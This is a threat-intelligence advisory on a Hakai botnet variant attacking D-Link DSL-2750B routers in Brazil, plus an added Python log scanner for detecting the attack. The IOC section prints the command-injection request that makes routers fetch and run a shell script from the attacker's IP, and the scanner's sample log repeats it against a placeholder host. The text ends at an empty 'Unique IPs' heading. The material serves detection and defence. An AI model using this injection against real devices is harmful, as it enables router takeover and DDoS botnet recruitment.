Tempest’s monitoring team identified a quite active variant of the Hakai botnet attempting to exploit vulnerabilities in D-Link DSL-2750B routers in Latin America, particularly in Brazil.

This botnet has been detected by our sensors 134 times this month alone and, so far, has used 119 different IP addresses.

The infection method is the same one used by other botnets that have been widely reported by Tempest and other researchers. It exploits a remote command execution vulnerability: the injected command makes the device download a shell script, which runs on the device and, depending on the device architecture, downloads the appropriate binary (hakai.mips, hakai.mpls, hakai.x86_x64). The binaries are packed with UPX (Ultimate Packer for eXecutables), a well-known open-source packer available on GitHub.

After the infection, the device connects to the attacker’s control panel and receives commands to attack or to attempt to infect other devices.

The control panel closely resembles that of the Gafgyt botnet, whose source code was released years ago and which was also identified as LizardStresser — the botnet used by the Lizard Squad group in its DDoS-as-a-service offering. This variant is able to launch HTTP, UDP, TCP and STD attacks. In an STD attack the bot sends packets carrying a random payload of 1024 bytes.

IOCs

Payload:

GET /login.cgi?cli=aa aa';wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk'
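To illustrate how the infection method and the payload above show up in device or proxy access logs, here is an added detection example (not code from Tempest or the original report). It flags requests to /login.cgi whose cli= parameter carries shell metacharacters or download tools, decodes the injected command and extracts the payload source URL; the log lines and the IP 198.51.100.7 are constructed samples, not indicators from the report.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (client, request line, status).
# The second line mimics the DSL-2750B login.cgi injection described above.
SAMPLE_LOG = """\
10.0.0.5 "GET /index.html HTTP/1.1" 200
10.0.0.9 "GET /login.cgi?cli=aa%20aa';wget%20http://198.51.100.7/e%20-O%20->%20/tmp/hk;sh%20/tmp/hk' HTTP/1.1" 200
10.0.0.12 "GET /login.cgi?cli=admin HTTP/1.1" 200
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Shell metacharacters and download tools that a legitimate cli= value never contains.
SHELL_INJECTION = re.compile(r"[;|`$&]|\b(wget|curl|tftp|busybox)\b")
# Payload source URL embedded in the injected command (stops at space, ; or quotes).
URL_IN_CMD = re.compile(r"(?:https?|tftp)://[^\s;'\"]+")


def analyze_request(uri):
    """Return a finding dict if a /login.cgi cli= parameter carries shell
    injection, else None. URL-decodes first, as the router's CGI does."""
    path, _, query = uri.partition("?")
    if path != "/login.cgi":
        return None
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    cli = unquote(params.get("cli", ""))
    if not SHELL_INJECTION.search(cli):
        return None
    return {
        "decoded_cli": cli,
        "payload_urls": URL_IN_CMD.findall(cli),   # candidate IoCs to block/hunt
        "drops_to_tmp": "/tmp/" in cli,            # stager written to /tmp, as in this campaign
    }


def scan_log(text):
    """Return a list of (source_ip, finding) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            finding = analyze_request(m.group("uri"))
            if finding:
                findings.append((m.group("src"), finding))
    return findings
```

The same parser works on real access logs once REQUEST_RE is adjusted to the device's log format; the extracted payload URLs can be fed into a blocklist or used to pivot on the download host.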

Payload source:

hxxp://46[.]166[.]185[.]42/e

MD5 hashes:

0590e9af54485c9a94ed97ea1b7c022c
e7a32ca82dca999437e5ebb4c76b6760
02baea1994dc58bbfa3bf7944629a6e3
c288f1fa87225e61f0757fb9eaeb237c

SHA256 hashes:

8ff5a8e20209267984ca4fe609ae7a8feccabda9114304c1444abc53cb169f5f
3d98fd28c344b067e91881d06942f7532a1f4084d908d882d3975fe0709c85f5
9688a3fdfd8fcb2caa2962623af9cd64c2a74887057900dbca5179aef8c5f319
4072d3b5393d86bf5b6586eec58efe79f3b5b428d183048968ad329fc982aa45

Unique IPs
